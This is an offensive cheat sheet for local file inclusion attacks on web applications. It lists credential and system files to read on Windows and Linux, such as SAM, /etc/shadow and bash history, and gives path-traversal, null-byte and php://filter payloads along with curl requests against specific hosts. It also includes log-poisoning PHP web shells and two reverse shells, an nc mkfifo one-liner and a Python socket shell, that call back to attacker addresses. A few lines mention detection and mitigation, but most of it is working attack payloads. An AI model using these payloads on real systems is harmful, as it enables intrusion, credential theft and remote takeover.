LFI
LFI Windows Files:
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\repair\SAM
%WINDIR%\win.ini
%SYSTEMDRIVE%\boot.ini
%WINDIR%\Panther\sysprep.inf
%WINDIR%\system32\config\AppEvent.Evt
LFI Linux Files:
/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/passwd
/etc/shadow
http://$ip/index.php?page=/etc/passwd
:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.6%209001%20%3E/tmp/f,
Contaminating Log Files <?php echo shell_exec($_GET['cmd']);?>
http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
curl http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/apache2/.htpasswd
192.168.0.23/admin.php?username=%0A/bin/cat/etc/passwd
192.168.0.23/admin.php?username=%0A/bin/cat/home/silky/flag.txt
username=%0A/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.23",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
curl -d "image=/etc/passwd" https://ip:15020/blog/download.php -k
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://ip/administrator/alerts/alertConfigField.php
http://192.168.1.145/index.php?page=../../../../../../../../../etc/passwd%00
text_file_name=ssp%2F../../../../../../../../../../etc/passwd&B=Display+File
LFI
http://example.com/page=../../../../../../etc/passwd%00
#bypass
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index
# First we save the cookie
curl -s http://example.com/login.php -c cookiefile -d "user=admin&pass=admin"
curl -s http://example.com/gallery.php?page=/etc/passwd -b cookiefile
Linux LFI
/etc/issue (A message or system identification to be printed before the login prompt.)
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
/etc/passwd
/etc/group
/etc/resolv.conf (may be less likely than /etc/passwd to trigger IDS signatures, so detection rules should not key on /etc/passwd alone)
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile
$USER/.bash_history or .profile
/root/.bash_history or .profile
#log
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
#windows
c:\WINDOWS\system32\eula.txt
c:\boot.ini
c:\WINDOWS\win.ini
c:\WINNT\win.ini
c:\WINDOWS\Repair\SAM
c:\WINDOWS\php.ini
c:\WINNT\php.ini
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\xampp\apache\conf\httpd.conf
c:\php\php.ini
c:\php5\php.ini
c:\php4\php.ini
c:\apache\php\php.ini
c:\xampp\apache\bin\php.ini
c:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini
http://192.168.1.102/index.php?page=../../../../../var/log/apache2/access.log&cmd=id
GET / HTTP/1.1
Referer: <? passthru($_GET[cmd]) ?>
Host: 192.168.1.159
Connection: close
nc ip 80
GET /AAAAAA<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: 192.168.1.102
Connection: close
nc ip 80
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: 192.168.1.102
Connection: close
#sensitive
/etc/issue (A message or system identification to be printed before the login prompt.)
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
/etc/passwd
/etc/group
/etc/resolv.conf (may be less likely than /etc/passwd to trigger IDS signatures)
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile
$USER/.bash_history or .profile
/root/.bash_history or .profile
# LFI
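# PHP Wrapper (php://filter base64-encodes the target file, so its source is disclosed instead of being executed by the include)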
php://filter/convert.base64-encode/resource=index.php
# Null Byte (PHP before 5.3.4 only; later versions reject paths containing %00)
?page=../../../../../../etc/passwd%00
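LFI to RCE (needs an include that executes the file plus an attacker-influenced file such as a log; allow-listing include targets and keeping logs unreadable to the web server account breaks the chain)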
# LFI and RCE
# Inject code execution
<?php echo system($_REQUEST["cmd"]);?>
# Go to LFI vuln and
?=…….&cmd=ls